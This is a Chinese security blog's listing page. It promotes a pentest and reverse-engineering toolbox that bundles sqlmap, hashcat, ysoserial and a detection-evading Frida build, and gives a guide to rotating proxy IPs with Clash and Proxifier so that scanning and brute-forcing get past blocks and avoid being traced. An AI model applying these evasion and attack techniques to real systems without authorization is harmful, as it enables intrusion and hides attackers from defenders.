首页
实用工具
我的旅程
在线壁纸
更多
✒️ 问题反馈
📦 文章统计
🌍 国内镜像
🎬 次元视界
📒 流水账本
🎨 在线 PS
推荐
🕵️ 开源情报
🌆 图片压缩
🍭 资产清洗
💡 我的作品
👤 关于站长
⚔️ 次 元 剑
搜索
1
【工具分享】逆向工具箱 - 次元剑
89,537 阅读
2
【技术分享】PE文件结构分析 ( RVA转FOA )
7,350 阅读
3
【技术分享】NASM x86 Assembly Language
5,982 阅读
4
【技术分享】CK竞技之王游戏辅助制作
3,725 阅读
5
【每日随记】天涯明月刀无限飞修改思路
2,816 阅读
技术分享
CTF解题
英语笔记
数学笔记
网络通信
每日随记
攻防技术
工具分享
Search
标签搜索
Windows
Web安全
Python3
Linux
逆向工程
CTF
红队技术
人工智能
C/C++
黑客工具
Go
密码学
二进制安全
数学
漏洞挖掘
Android
eNSP
渗透测试
蓝队技术
黑客大会
发光的神
累计撰写
160
篇文章
累计收到
103
条评论
首页
栏目
技术分享
CTF解题
英语笔记
数学笔记
网络通信
每日随记
攻防技术
工具分享
页面
实用工具
我的旅程
在线壁纸
✒️ 问题反馈
📦 文章统计
🌍 国内镜像
🎬 次元视界
📒 流水账本
🎨 在线 PS
推荐
🕵️ 开源情报
🌆 图片压缩
🍭 资产清洗
💡 我的作品
👤 关于站长
⚔️ 次 元 剑
搜索到
40
篇与
的结果
2026-07-09
【工具分享】逆向工具箱 - 次元剑
{callout color="#54b5db"}🍭 次元剑 - 最新版本:v1.0.9{/callout}留言B站我改名了从 “ACT忆梦” 换成了 发光的神,我换名字挺快的,基本都会有神字。不敢太高调,“神” 对于我来说还是太遥远了,所以还是为成神而努力发光吧。📖{mtitle title="你好,我是墩墩"/}中二的故事在浩瀚如星空的网络世界里,有一把神剑,它的名字深深印在那些敢于挑战者的心中。“次元剑(MetaSword)”是一把二次元的剑,它的诞生,早已超越了技术的范畴,力量与智慧的象征,是数不清的传奇故事交织而成的。创造者已经消失在历史的长河中,渐渐的被遗忘 。次元剑,它见证了时代的变迁,承载着前人奋斗的足迹,每一代工匠的锤炼,都让它更加锋利。从最初的锻造到今天,它经历了无数次的进化与提升,每一次的蜕变,都是对未来挑战的预演。它的锋利,永远不会随着时间的推移而削弱。随着科技的飞速进步,它会不断蜕变,每一次更新,都是一次力量的觉醒。无论是面对艰难的逆向工程,还是扑朔迷离的渗透测试,次元剑总能以无可匹敌的敏捷,帮助使用者克服所有的困难,打破障碍,突破极限。次元剑真正的力量,不是技术的完美,是来源于使用者的勇气与智慧。只有那些敢于迎接挑战、敢于突破常规的人,才能真正激发出次元剑的无尽潜能。最后让我们一起 “手握次元剑,仗梦走星辰” 吧。我还有句更酷的话:“手握次元剑,踏破九重天”。心中的剑“次元剑” 这个名字听起来可能有些中二,我给它赋予这个名字大部分原因是跟动漫有关,因为天马行空的想法和创意,只有在动漫里会出现,我想让它像动漫一样,拥有无限的可能性。工具箱的动态 Logo 来自于《刀剑神域》(Sword Art Online)。我很喜欢这部动漫作品,第一次看到主角使用星爆气流斩时,这就是男主角,总能给大家带来希望。他的坚定与勇气激励了我。作为主角的他每次总能化险为夷。我觉得,他的强大并不是来自外界,而是他的信念,还有他自己想守护的东西。除了日漫还有国漫,我比较喜欢斗破苍穹三年之约里药老的几句话:“当你紧握双手,里面什么也没有,当你打开双手,世界就在你手中。”“这个世界才没有什么真正的强者,有的只是想要变强的人。”“如果想要真正把剑挥出去,就要把心里的事放下。” “我想,挥剑和专注做事一样,应该就是把心里的顾虑全部放下。” 这么多年过去,初心没变。身边的人来了又走,经历了很多事,但人不能总活在回忆里,就算一个人,也要一直向前走。我还是那个热爱计算机技术的人,喜欢钻技术难题,连我自己都没想到,这件事竟然坚持了这么久。看到这里的你,如果是初学者,请一定要相信,你也可以。幻想爽文 .iframe-wrap-one{ width: 100%; height: 68vh; margin: 10px 0 0; border-radius: 12px; overflow: hidden; box-shadow: 0 8px 24px rgba(0,0,0,.12); } .iframe-wrap-one iframe{ width: 100%; height: 100%; border: 0; } 设计初衷次元剑官网{abtn icon="fa-ravelry" color="#000000" href="https://www.52tt.pro/tools/sword/" radius="" content="次元剑 - 逆流而上 | 点击进入"/} 技术可以垃,但一定要有B格,主要是自己写的有成就感些,工具整合后,查找起来更加方便啦!{abtn icon="fa-book" color="#e10000" href="https://www.52tt.pro/tools/sword/docs/" radius="" content="次元剑 - 使用教程 | 点击进入"/} 次元剑出鞘,这个故事,才刚刚开始。水墨特效 次元剑自带水墨启动特效,默认是开启的。如果你想关闭它,或者调整动画速度,都可以在设置中修改。基本功能{tabs}{tabs-pane label="次元・起源"} .flex-center-one { display: flex; justify-content: center; align-items: center; } .flex-center-one img { width: 550px; height: auto; } 主界面采用动感背景纹理 + 双剑视觉元素,精致且富有冲击力。Logo 灵感源自《刀剑神域》,界面边缘辅以 MetaSword 次元剑专属标识,整体风格鲜明、沉浸感更强。{/tabs-pane}{tabs-pane label="工具分类"} .flex-center-two { display: flex; justify-content: center; align-items: center; } .flex-center-two img { width: 543px; height: auto; } 工具分类采用了我个人偏好的方式设计,主要是为了使用更顺手。当然,也可能存在一些小bug,哈哈哈。模块名称核心工具适用场景Reverse(逆向分析)IDA Pro、x64dbg、Cheat Engine程序反编译、动态调试、内存修改、漏洞挖掘PenTest(渗透测试)Yakit、Tscan信息收集、漏洞扫描、渗透测试、安全评估Language(编程语言)Python、Java、C/C++ 环境脚本编写、代码编译、快速调试Other(杂项工具)文件管理、环境检测、格式转换辅助开发、系统配置、多场景适配Frida IDE(代码编辑器)魔改 Frida-Server动态注入、脚本调试、数据解密{/tabs-pane}{tabs-pane label="右键菜单"} 每个工具都支持右键菜单,可以打开程序存放位置,跟以管理员身份运行。{/tabs-pane}{tabs-pane label="批量删除"} 按住鼠标左键可选中工具批量删除,直接拖动可调整工具位置。{/tabs-pane}{/tabs-pane}{tabs-pane label="基础计算"} 一、基础计算直接输入表达式,Enter 计算,结果自动回填。支持:+ - * / ( ) 与数字、空格示例:1+5→6、(100+200)*3→900二、进制转换(仅支持 2/8/10/16 进制,英文括号)十进制转其他:(数字, 目标进制) 例:(4132,2)→二进制任意互转:(数字, 原进制, 目标进制) 例:(FF,16,10)→255十六进制大小写通用,支持空格三、AI 问答输入问题,按 Ctrl+Enter 提问,回答逐字显示。冷却 2 秒,不可连续提问使用步骤进入工具页 → 激活顶部搜索框计算/进制转换:EnterAI 问答:Ctrl+Enter注意事项必须使用英文括号结果会直接替换输入框内容{/tabs-pane}{tabs-pane label="窗口拉伸"} 主界面支持自由拉伸,窗口大小可根据使用习惯灵活调整(并记录最后一次关闭时的窗口尺寸)。{/tabs-pane}{tabs-pane label="设置面板"} 水墨开场特效可在设置面板开关,支持主题切换、MCP 配置、DeepSeek AI 设置,新增关于软件区域。{/tabs-pane}{tabs-pane label="关于作者"} 点击头像即可跳转到我的博客,头像文字还带有一点故障风的动画效果。{/tabs-pane}{/tabs}次元主题 .iframe-wrap-two{ width: 100%; height: 55vh; overflow: hidden; border-radius: 12px; } .iframe-wrap-two iframe{ width: 100%; height: 100%; border: 0; } Frida 编辑器(过检测版){message type="info" content="本内容仅用于学习与演示,请勿用于任何违法行为。"/}在工具栏中点击顶部导航栏 Frida IDE,即可打开 Frida Hook 代码编辑器。{tabs}{tabs-pane label="次元剑 Frida"} {/tabs-pane}{tabs-pane label="官方 Frida"} {/tabs-pane}{/tabs}次元剑内置魔改版 frida-server,并结合启动注入方式,官方 Frida 注入会被立即干掉,魔改版可无视此类检测。{tabs}{tabs-pane label="启动(Spawn)"} 在 Android 上,提供启动(Spawn)与 附加(Attach)两种注入模式,可选择直接附加正在运行的应用。{/tabs-pane}{tabs-pane label="附加(Attach)"}{/tabs-pane}{tabs-pane label="AI 代码编写"} 在 Windows 上可通过输入 PID 或拖拽程序进行注入,支持已启动和新启动的进程。次元剑内置 FridaIDE 模块专为动态注入与脚本开发而设计,简洁高效,适配多平台与调试场景:✅ 支持主流模拟器:兼容雷电、MuMu 等,无需繁琐配置即可注入运行。✅ Windows 与 Android 双平台调试:一键注入目标进程,快速启动 Hook。✅ 内置脚本补全引擎:涵盖 Java、ObjC、Memory、Module 等 API,辅助高效编写。✅ 集成 DeepSeek R1:AI 帮你生成 Hook 脚本逻辑,轻松上手。✅ 调试输出高亮显示:关键信息一目了然,快速定位调试重点。轻量化集成,功能完整,助你快速完成 Frida 脚本编写与注入。{/tabs-pane}{/tabs}AI 智能体{tabs}{tabs-pane label="DeepSeek-v4-Pro/Flash(支持 Agent)"} .flex-center-three { display: flex; justify-content: center; align-items: center; } .flex-center-three img { width: 100%; height: auto; } 前往 DeepSeek 官网获取 API key → 添加至设置 → 即可开启 AI 智能体功能。操作步骤1.先到 https://platform.deepseek.com/api_keys 进行创建 API key。 2.填入 API key 后点击保存即可使用(无需重启次元剑)。{/tabs-pane}{tabs-pane label="ChatGPT 3.5"} .flex-center-four { display: flex; justify-content: center; align-items: center; } .flex-center-four img { width: 75%; height: auto; } 只是 3.5,不是 4.5? 等我发达先。{/tabs-pane}{tabs-pane label="本地/远程 Ollama"}推荐模型:qwen2.5-coder:14b,参数越大越好(当然你的电脑够给力),小点的模型回复挺憨憨的。操作步骤1.访问 Ollama 官网: https://ollama.com/download,下载并安装 Ollama 程序。2.安装完成 Ollama 后,按下 Ctrl + R,输入 cmd 并回车打开命令提示符窗口,然后运行以下命令:ollama pull qwen2.5-coder:14b模型下载完成后,重启次元剑即可显示本地模型。更多模型可在官网查看:https://ollama.com/search{/tabs-pane}{tabs-pane label="GPT-OSS:120b"}【无图】在线模型,可直接使用。{/tabs-pane}{/tabs}MCP & Trae{tabs}{tabs-pane label="效果展示"}{/tabs-pane}{tabs-pane label="配置教程"}操作步骤1.打开 Trae → 设置 → 选择 MCP,启用手动配置。2.打开次元剑 → 设置 → 点击 MCP 配置复制参数,粘贴到 Trae 并确认即可。{/tabs-pane}{/tabs}开发者工具次元剑基于 Electron 框架开发,本质上可以看作一个浏览器应用,按下 Ctrl + P 即可打开内置的开发者工具。程序源码当然,你们也可以随意修改或添加功能,源码已开源,尽情发挥吧!源码结构 .dircard{background:#fff;border:1px solid #e5e7eb;border-radius:12px;padding:12px 14px;box-shadow:0 4px 16px rgba(0,0,0,.05)} @media (prefers-color-scheme: dark){.dircard{background:#0b0f14;color:#e5e7eb;border-color:#263241}} .codegrid{display:grid;grid-template-columns:auto 1fr;column-gap:16px;row-gap:.1em} .left{white-space:pre;tab-size:2} .right{color:#6b7280;white-space:pre-wrap} .k{color:#4f9e28;} app 🗂️ 核心源码 ├─ Core 🧩 主程序核心:应用逻辑、进程管理、功能调度 │ ├─ MetaSword.js ⚔️ 主入口:应用初始化、模块加载、生命周期 │ └─ MCPFunc.js 🔧 MCP 功能注册与调度中心 ├─ Nexus 🖼️ 主界面框架:UI 渲染 + 用户交互核心 │ ├─ Assets 🎨 公共资源库(全局共用素材) │ │ ├─ Image 🖼️ 公共图片、图标、背景资源 │ │ ├─ Sounds 🎵 音效、提示音资源 │ │ └─ Videos 🎬 动画、启动视频资源 │ ├─ CSS 🎨 全局样式:布局、皮肤、响应式适配 │ ├─ Fonts 🔡 全局字体库 │ │ └─ FontAwesome 🔠 图标字体库 │ │ ├─ css 🎨 FA 样式文件 │ │ ├─ fonts 🔡 字体文件 │ │ ├─ less 🧩 Less 源文件 │ │ └─ scss 🎛️ SCSS 源文件 │ ├─ JS 📜 全局脚本核心 │ │ ├─ AceMain ⚡ Ace 代码编辑器:补全、高亮、调试 │ │ │ └─ snippets ✂️ 代码片段库 │ │ └─ prismjs 🌈 代码语法高亮引擎 │ │ ├─ components 🧩 高亮组件 │ │ └─ themes 🎨 高亮主题 │ └─ Views 🖥️ 主界面模板:页面结构、弹窗、布局 │ └─ config ⚙️ 界面配置:视图参数、布局预设 ├─ Plugins 🔌 插件扩展 │ ├─ claude 🤖 Claude Code 集成 │ │ ├─ .claude ⚙️ Claude 配置中心 │ │ │ ├─ projects 📁 项目上下文记忆库 │ │ │ ├─ sessions 📝 会话记录与历史 │ │ │ └─ skills 🧰 安全审计技能包(PHP/.NET/CTF) │ │ ├─ AppData 💾 应用数据持久化 │ │ └─ Cache 🚀 本地缓存 │ ├─ CLI 🛠️ 命令行工具集(内嵌运行环境) │ │ ├─ apktool 📦 Android APK 反编译/重打包 │ │ ├─ arp-scan 🌐 ARP 网络扫描与发现 │ │ ├─ curl 🍭 HTTP/网络请求调试 │ │ ├─ dnSpy 🧬 .NET 反编译/调试/修改 │ │ ├─ exiftool 📷 文件元数据读写/取证 │ │ ├─ frida-tools ⚡ Frida 动态插桩工具链 │ │ ├─ fuff 🕷️ Web 目录/文件模糊测试 │ │ ├─ hashcat 🔐 GPU 哈希破解引擎 │ │ ├─ masscan ⚡ 超高速端口扫描器 │ │ ├─ radare2 🏴 反汇编/二进制分析框架 │ │ ├─ sqlmap 💉 SQL 注入自动化检测与利用 │ │ ├─ strings 🔎 二进制字符串提取 │ │ ├─ tshark 🦈 网络协议分析(Wireshark CLI) │ │ ├─ upx 📦 可执行文件加壳/脱壳 │ │ ├─ volatility3 🧠 内存取证分析框架 │ │ ├─ wafw00f 🛡️ Web 应用防火墙识别 │ │ └─ ysoserial 💥 Java 反序列化漏洞利用 │ └─ frida 🧩 Frida 动态插桩插件 │ ├─ Exten ⚙️ 运行依赖(Frida 运行时库) │ └─ Script 📝 Hook 脚本仓库 └─ Theme 🎨 多主题皮肤中心 ├─ Cover 🖼️ 主题封面资源 ├─ Fate 🕑 命运主题 ├─ Origin 🐳 起源主题 ├─ Reimu 🏳️🌈 灵梦主题 ├─ Ziya 🟣 紫雅 · 源主题 └─ Ziya Grey ⚪ 紫雅 · 灰主题 ├─ Assets 🎨 主题专属资源 │ └─ Image 🖼️ 主题图片、角色立绘 ├─ CSS 🎨 主题样式 └─ Views 🖥️ 界面布局 项目开源项目已上传至 GitHub,可直接替换次元剑 app 文件夹,即可完成版本更新。感兴趣的朋友欢迎点个 Star,我将持续更新视频教程与次元剑功能。若你有好的建议,随时可以联系我哦~ .toast-container { position: fixed; top: 130px; left: 50%; transform: translateX(-50%); z-index: 9999; max-width: 520px; width: 100%; } .toast { background-color: #0f141e; color: #e6edf7; padding: 14px 20px; margin-bottom: 16px; border-radius: 10px; border: 1px solid #272f3f; display: flex; justify-content: space-between; align-items: center; box-shadow: 0 0 16px rgba(139, 92, 246, 0.18); opacity: 0; transform: translateY(-40px) scale(0.96); transition: opacity 0.4s ease, transform 0.4s cubic-bezier(0.2, 0, 0.2, 1); font-size: 14px; } .toast.show { opacity: 1; transform: translateY(0) scale(1); } .toast .close-btn { background: none; border: none; color: #7c8798; font-size: 20px; cursor: pointer; padding: 2px 6px; margin-left: 16px; border-radius: 6px; transition: all 0.25s ease; } .toast .close-btn:hover { transform: scale(1.15); color: #ff5656; background: rgba(255, 86, 86, 0.1); } .toast .message { font-size: 15px; line-height: 1.6; flex-grow: 1; } .highlight-green { color: #22c55e; text-shadow: 0 0 6px rgba(34, 197, 94, 0.35); font-weight: 600; } .highlight-purple { color: #a78bfa; text-shadow: 0 0 8px rgba(139, 92, 246, 0.4); font-weight: 600; } function showToast(message, duration = 5000) { const toastContainer = document.getElementById('toastContainer'); const toast = document.createElement('div'); toast.classList.add('toast'); const messageElement = document.createElement('span'); messageElement.classList.add('message'); messageElement.innerHTML = message; toast.appendChild(messageElement); const closeButton = document.createElement('button'); closeButton.textContent = '×'; closeButton.classList.add('close-btn'); closeButton.onclick = () => { toast.classList.remove('show'); setTimeout(() => toast.remove(), 500); }; toast.appendChild(closeButton); toastContainer.appendChild(toast); setTimeout(() => toast.classList.add('show'), 80); setTimeout(() => { toast.classList.remove('show'); setTimeout(() => toast.remove(), 400); }, duration); } showToast("⚡ 史诗级 AI 版本更新公告,次元剑 v1.0.9 已正式上线,受外部条件限制,当前 AI 智能体暂时使用 Claude Code 驱动,自研引擎将在 v1.1.0 Beta 版本更新上线。", 10000); 版本更新{collapse}{collapse-item label="📜 历史记录" close}{timeline}{timeline-item color="#19be6b"}{card-describe title="2023-8-31"}📦 更新内容:版本:1.0.0 🛠️【技术】基于 Node.js、HTML/CSS、JS、Electron 构建🚀【新增】初代固定布局,包含主页、工具、ChatGPT、关于四大模块🚀【新增】复古圆角按钮,打造独特UI风格💪【优化】初步优化代码逻辑,项目持续迭代工具数量:62 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-6-16"}📦 更新内容:版本:1.0.1 🚀【新增】全新固定式UI布局,圆角按钮更简约现代🚀【新增】支持外部工具自定义,采用ToolsList.xml管理🚀【新增】优化双剑动画,界面更流畅美观🚀【新增】新增逆向与渗透常用工具,拓展实用性💪【优化】重构代码逻辑,提升稳定性与可维护性工具数量:85 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-7-15"}📦 更新内容:版本:1.0.2 🚀【新增】集成Frida IDE,支持独立编辑窗口,优化调试体验🚀【新增】自定义工具管理,通过ToolsList.xml灵活配置🚀【新增】水墨风Logo动画,提升开场视觉感工具数量:98 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-11-10"}📦 更新内容:版本:1.0.3-stable 🚀【新增】F1 快捷键快速隐藏/显示窗口🚀【新增】可关水墨开场动画,配置存入 ToolsList.xml🚀【新增】集成 Java、Python 脚本,支持一键 .bat 启动💪【优化】美化 Frida IDE 界面,支持拖拽代码注入💪【优化】兼容绝对路径配置,提升 ToolsList.xml 可用性🐞【修复】修复 Frida 权限不足,精简冗余逻辑🚀【新增】Frida IDE 快捷键:快捷键功能说明CTRL + +代码字体放大CTRL + -代码字体缩小CTRL + ALT + F代码缩进CTRL + /代码注释CTRL + F快速搜索工具数量:98 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-11-23"}📦 更新内容:版本:1.0.4 🚀【新增】新增逆向分析与渗透测试工具,功能更全面🚀【新增】新增设置面板,支持动画、主题、版本更新💪【优化】优化UI与视觉效果,精简代码💪【优化】移除启动动画XML配置,提升启动稳定性🐞【修复】修复Frida注入报错0x00000057问题🚀【新增】Frida IDE快捷键增强:快捷键功能说明CTRL + +代码字体放大CTRL + -代码字体缩小CTRL + ALT + F代码缩进CTRL + /代码注释CTRL + F快速搜索CTRL + H快速替换CTRL + L代码定位CTRL + D按行删除CTRL + ,设置面板ALT + E代码自检工具数量:100 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2025-3-31"}📦 更新内容:版本:1.0.5 🚀【新增】清理无效工具,替换为实用工具🚀【新增】工具右键支持打开程序位置🚀【新增】CheckTools 模块,校验工具完整性🚀【新增】集成运行环境,工具即点即用💪【优化】优化 UI 与性能,精简冗余逻辑🐞【修复】修复拖拽异常,增强 UAC 权限兼容工具数量:99 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2025-8-5"}📦 更新内容:版本:1.0.6 Beta 🚀【新增】全面重构代码,统一目录规范,提升稳定性🚀【新增】精简无用工具,新增实用常用工具🚀【新增】右键菜单:打开位置、管理员运行🚀【新增】集成 DeepSeek R1 AI,智能生成 Frida Hook 代码🚀【新增】支持窗口拉伸,适配多分辨率💪【优化】优化UI细节,界面更清爽统一💪【优化】清理冗余代码,程序更轻巧流畅🐞【修复】修复已知Bug,提升兼容与稳定性🐞【修复】优化UAC提权逻辑,适配更多环境🐞【修复】修复部分工具拖拽异常工具数量:100+{/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2026-1-7"}📦 更新内容:版本:1.0.7🚀【新增】次元剑动漫风格Logo主题,适配启动/主界面视觉💪【优化】清理冗余代码依赖,程序轻量化,运行更流畅💪【优化】精简工具库,保留常用工具,提升查找调用效率🐞【修复】修复已知问题,优化整体使用体验工具数量:100+{/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2026-04-1"}📦 更新内容:版本:1.0.8🚀【新增】支持 MCP 协议,联动 Trae 实现 AI 上下文交互🚀【新增】右键增删工具、长按批量删除、主题切换🚀【新增】支持添加工具,并在工具箱内自由拖拽摆放🚀【新增】输入框 Ctrl+Enter 快捷提问 AI、随机一言🚀【新增】工具箱启动提示更新,支持在线升级版本💪【优化】Frida IDE 代码高亮与提示性能💪【优化】重构代码,优化 UI 展示工具数量:100+{/card-describe}{/timeline-item}{timeline-item color="#ff0000"}{card-describe title="2026-06-28"}📦 更新内容:版本:1.0.9🚀【新增】AI 智能体,暂时集成 Claude Code + DeepSeek V4 Pro/Flash🚀【新增】终端工具栏,Skills 安装、提示词、MCP 面板、安全模式🚀【新增】CTF 全栈 skills(Web/PWN/Reverse 等 8 大类)+ 自动 Writeup🚀【新增】.NET + PHP 代码审计管线,30+ 审计 skill🚀【新增】内置 16 个 CLI 安全工具,AI 自动感知并优先调用🚀【新增】MCP 多语言运行时:Python / Java / C 在线编译执行🚀【新增】Agent 侧边面板,实时日志 + 权限弹窗 + 调用追踪💪【优化】精简 MCP 工具,移除冗余 I/O 接口,统一 CLI 直调💪【优化】重构主进程架构,统一无边框透明窗口体系💪【优化】5 套主题一键切换(起源/命运/紫雅/灵梦)💪【优化】启动动画可配置,全局快捷键,版本自动检测更新工具数量:100{/card-describe}{/timeline-item}{/timeline}{/collapse-item}{/collapse}工具下载{tabs}{tabs-pane label="工具下载"} .meta-container { max-width: 780px; margin: 30px auto; padding: 40px 30px; background-color: #fff; border: 1px solid #e5e7eb; border-radius: 18px; box-shadow: 0 6px 20px rgba(0, 0, 0, 0.05); font-family: 'Inter', 'Segoe UI', sans-serif; } .meta-header { display: flex; justify-content: center; margin-bottom: 18px; } .meta-logo-group { display: flex; align-items: center; } .meta-logo { height: 56px; margin-right: 12px; } .meta-title-group { display: flex; flex-direction: column; justify-content: center; } .meta-title { font-size: 24px; font-weight: 700; color: #111; letter-spacing: 3px; line-height: 1; margin-left: 30px; } .meta-subtitle { font-size: 14px; color: #888; line-height: 1.4; margin-top: 3px; } .meta-warning { text-align: center; font-size: 15px; color: #555; margin-bottom: 35px; } .link-list { display: flex; flex-direction: column; gap: 14px; } .link-block { display: flex; align-items: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; transition: background-color 0.2s ease; } .link-block:hover { background-color: #e5e7eb; } .link-icon { width: 20px; height: 20px; margin-right: 12px; flex-shrink: 0; } .link-code { background: #eee; padding: 2px 6px; border-radius: 4px; } 次 元 剑 MetaSword Toolbox v1.0.9 个别工具可能被安全软件误报,不放心可在虚拟机中使用。 【百度网盘】次元剑完整版|版本 1.0.9(2026.6.28)|提取码: 2085 【115网盘】次元剑完整版|版本 1.0.9(2026.6.28)|提取码: z075 【夸克网盘】次元剑完整版|版本 1.0.9(2026.6.28)|提取码: 无 【GitHub】MetaSword 源码仓库|仅包含基础源码,不包含工具 {message type="info" content="请确保次元剑安装路径不含中文字符,避免一些工具无法使用。"/}错误示例:D:\VoxShadow\次元剑\MetaSword 正确示例:D:\VoxShadow\MetaSword{/tabs-pane}{tabs-pane label="报毒说明"}可疑类型:后门、黑客工具、代码混淆器、木马、漏洞攻击、下载者、间谍、勒索。已完成威胁处置,当前仅剩 101 个低风险可疑文件,初步判断不影响电脑正常使用。{/tabs-pane}{/tabs}工具箱有任何建议或问题,可在 GitHub 提交 Issue,欢迎 Star 支持。定期更新次元剑内工具使用技巧,更多内容请关注:B站 | 抖音 账号。视频中用到的部分Hook代码,仅供参考:Frida Hook篇友情赞助 .donate-modern { max-width: 720px; margin: 0px auto; border-radius: 20px; background-color: #fff; text-align: center; } .donate-modern h2 { font-size: 22px; font-weight: 600; color: #111; margin-bottom: 8px; } .donate-modern p { font-size: 14px; color: #666; } .donate-qrcodes { display: flex; justify-content: center; gap: 40px; flex-wrap: wrap; } .donate-card { width: 200px; border-radius: 16px; padding: 16px; transition: all 0.2s ease; } .donate-card img { width: 100%; border-radius: 12px; margin-bottom: 10px; border: 1px solid #eee; } .donate-card span { font-size: 14px; color: #333; font-weight: 500; } 如果你觉得这个项目还不错,欢迎扫码支持一下 ❤️ 开源不易,维护更难!如果次元剑对你有帮助,欢迎给点小小的支持~ 💖你的认可和鼓励,就是我持续优化更新的动力!感谢陪伴,一起成长!✨免责声明本工具箱仅供学习与研究使用,旨在帮助用户提升技术能力,请勿将其用于非法用途,否则产生后果由使用者自行承担,作者不对任何滥用行为负责,敬请理性使用,遵守法律法规。2026-6-27 20:20 星期六 更新过
2026年07月09日
89,537 阅读
68 评论
4,563 点赞
2025-11-04
【工具分享】开源情报站 - 公益篇
简介在渗透测试与网络安全研究中,漏洞情报的获取效率直接影响测试深度与响应速度。这款开源情报工具核心定位为「公开漏洞资源聚合平台」,通过自动化收集互联网上合法公开的漏洞数据(如CNNVD、CVE官方披露信息、开源社区漏洞报告等),为安全从业者提供一站式资源查询入口,彻底告别手动检索、信息零散的痛点。工具的核心价值在于「精准聚合+高效利用」:一方面,它自动爬取并整理公开渠道的漏洞详情,包括漏洞名称、危险等级、影响厂商、漏洞描述、参考链接及官方补丁等关键信息,无需用户在多个平台间切换筛选;另一方面,通过结构化展示(分级标注、关键词搜索、分页查询),让渗透测试人员能快速定位目标相关漏洞,降低情报收集的时间成本,更专注于漏洞验证与防护方案落地。{abtn icon="fa-eercast" color="#000000" href="https://www.52tt.pro/tools/osint/" radius="" content="OSINT - 开源情报 | 点击进入"/}实时漏洞实时动态更新漏洞信息。公益Fofa当前是临时版,前端之后会大改,现在常用的 Fofa 搜索语句都保留着,能实时免费查 Fofa 数据。更新计划{timeline}{timeline-item color="#19be6b"}公益Fofa(免费使用)已推出{/timeline-item}{timeline-item color="#19be6b"}全新版本资产测绘系统,更新中 ...{/timeline-item}{/timeline}免责声明仅用于合法授权的渗透测试、网络安全研究与防护演练。数据源于互联网公开资源,严禁非法攻击行为。请严格遵守《网络安全法》及相关法规,坚守合规伦理底线。
2025年11月04日
1,431 阅读
2 评论
262 点赞
2025-05-28
【攻防技术】Proxifier + Clash 轮询代理隐藏真实IP
简介在当前攻防对抗中,大多数目标单位均配有安全设备,如 WAF、IPS、防火墙等,渗透过程中常常出现 IP 被封现象。为了降低暴露风险,本篇以实战角度出发,结合 Clash 的轮询负载均衡与 Proxifier 联动,实现 IP 动态切换,最大程度隐藏真实身份,避免被溯源。负载均衡配置流程先到设置(Settings)里找到 Parsers 这个选项,点击编辑(Edit)。把以下配置填进去,然后进行保存。Clash 负载均衡配置parsers: - reg: 'Proxy$' yaml: append-proxy-groups: - name: ⚖️ 负载均衡-散列 type: load-balance url: 'http://www.google.com/generate_204' interval: 300 strategy: consistent-hashing - name: ⚖️ 负载均衡-轮询 type: load-balance url: 'http://www.google.com/generate_204' interval: 300 strategy: round-robin commands: - proxy-groups.⚖️ 负载均衡-散列.proxies=[]proxyNames - proxy-groups.0.proxies.0+⚖️ 负载均衡-散列 - proxy-groups.⚖️ 负载均衡-轮询.proxies=[]proxyNames - proxy-groups.0.proxies.0+⚖️ 负载均衡-轮询这段配置就干了两件事:新增两个 "负载均衡" 分组散列分组:用一致性哈希(consistent-hashing)把请求分给各节点轮询分组:用轮询(round-robin)依次分给各节点两个分组都会每 300 秒去 http://www.google.com/generate_204 测一次可用性。把现有的所有代理都加到这两个分组里,并且把这两个分组排到代理组列表的最前面。这样配置后,就可以在用代理 选 "负载均衡-散列" 或 "负载均衡-轮询" 来智能分发流量。然后到 Profiles 里设置下节点配置。在 URL 最后加上 #Proxy,即可触发 Clash 中对应的 Parsers 规则,添加完成后点击 OK 保存即可。再刷新下就会出现 负载均衡-散列 跟 负载均衡-轮询 选项,这里我先选着轮询配合以下 Proxifier 做演示。工具联动先配置下 Proxifier,找到 Proxy Servers。根据序号步骤操作添加 Clash 代理服务IP跟端口,协议设置socks5,配置好了就点 ok 保存。配置代理规则,填好了一路保存,这里我指定了 Tscan Plus 渗透测试工具,以下是测试。效果对比不用负载均衡可以发现在没有使用负载均衡的情况下,扫描服务器的IP始终保持同一个,而且流量多了很快就被发现封禁。使用负载均衡使用了负载均衡,扫描服务器的IP地址在实时发生变化。(不是扫一次暂停变化,而是一直扫,一直变)监听脚本import socket from datetime import datetime HOST = '0.0.0.0' PORT = 5201 def start_listener(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server: server.bind((HOST, PORT)) server.listen(5) print(f"[√] 正在监听 {HOST}:{PORT} ...") while True: conn, addr = server.accept() ip, port = addr now = datetime.now().strftime("%Y-%m-%d %H:%M:%S") print(f"[{now}] [+] 连接来自:{ip}:{port}") conn.close() if __name__ == "__main__": start_listener()总结轮询(Round-Robin)机制说明:请求按照顺序分配给不同代理节点。节点越多,切换越频繁。例如有 3 个代理,顺序为 1→2→3→1→2...渗透应用场景:目录扫描、接口 Fuzz、密码爆破等高频操作绕过单个 IP 的限频和封锁限制模拟大规模并发访问特点:每次请求更换 IP,具备较强的防封能力多节点可实现带宽叠加,提高打点效率会话状态无法保持,易导致登录状态丢失IP 波动频繁,容易被风控识别为异常行为常见用途:配合测速工具或并发爆破程序使用,可显著提升速度和效果。一致性哈希(Consistent Hashing)机制说明:使用哈希算法将请求绑定到特定代理节点,相同域名始终走同一个 IP。节点变化对大多数请求影响较小。渗透应用场景:需要维持登录态或会话的系统交互操作模拟真实用户行为,降低风控触发概率长时间稳定访问目标系统(如后台、管理系统)特点:请求稳定,适合登录类或认证类操作隐蔽性好,不容易被系统识别为异常用户IP 固定,无法绕过限速策略无法叠加带宽,打点效率低于轮询模式常见用途:适用于登录后台、提交表单、敏感数据抓取等操作。策略总结策略适用场景优点缺点轮询高频打点、爆破、探测IP 轮换快、防封、效率高会话不连续、易触发风控哈希登录、维稳、数据交互IP 稳定、隐蔽性好无法绕过限速、带宽不可叠加其它除了 Proxifier 配合 